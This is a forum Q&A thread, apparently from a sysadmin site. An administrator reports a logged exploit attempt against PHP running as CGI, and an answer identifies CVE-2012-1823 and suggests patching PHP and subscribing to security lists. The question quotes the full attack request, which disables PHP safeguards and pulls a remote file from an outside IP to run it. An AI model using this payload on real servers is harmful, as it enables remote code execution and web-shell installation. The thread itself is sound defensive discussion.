2

I'm getting a number of exploit attempts from different IP's today.

GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt

The content of info3.txt is:

Google is showing a bunch of people talking about this for the past couple of days but no real solutions or explanations of what this is. There is a write up at: http://huguesjohnson.com/programming/hacking-attempt/

"I think this is where I'll leave things for now. I don't know if this site is part of a crime ring but since it has access to a botnet I'm going to assume it is. The 81.17.24.82 IP isn't showing up anywhere as a distributor of malware which is odd. Maybe this is a web server that was recently compromised or an IP address recently acquired by whoever is organizing this attack."

My question is: What is the next step in situations like this? Is there a best practice that administrators should follow to notify security folks? Which sites do you follow to keep on top of things like this and apply the proper safeguards (like mod_security)?

Ryan Johnston
  • 21
  • 1

1 Answers1

3

It's obvious that they try to exploit the recent bug found in PHP when configured as CGI (CVE-2012-1823).
What they are trying to achieve in the end, we can only guess until we hear from people who actually got compromised and analyzed the server afterwards.
From what it looks like at the moment, it is being tried to run the C99 shell on those servers. We can't link that to botnet recruiting or any other purpose yet.

As an Administrator you should certainly check that you are not vulnerable to that attack.
Which in this case is to verify that you have PHP >=5.3.12 deployed.

You could try to contact the abuse team of the owner of the IP from which the attack is originating and the IP on which the info3.txt is being hosted. But that provider will probably be not very impressed by your claim.

Notify security folks?
No, I wouldn't, it's trying to exploit a known bug.

I found it useful to subscribe to the security and/or announce mailing list of the software which I'm exposing to the Internet and of our base operating system.
This way I'm getting notified quickly about security problems and new releases which really concern me.

faker
  • 17,496
  • 2
  • 60
  • 70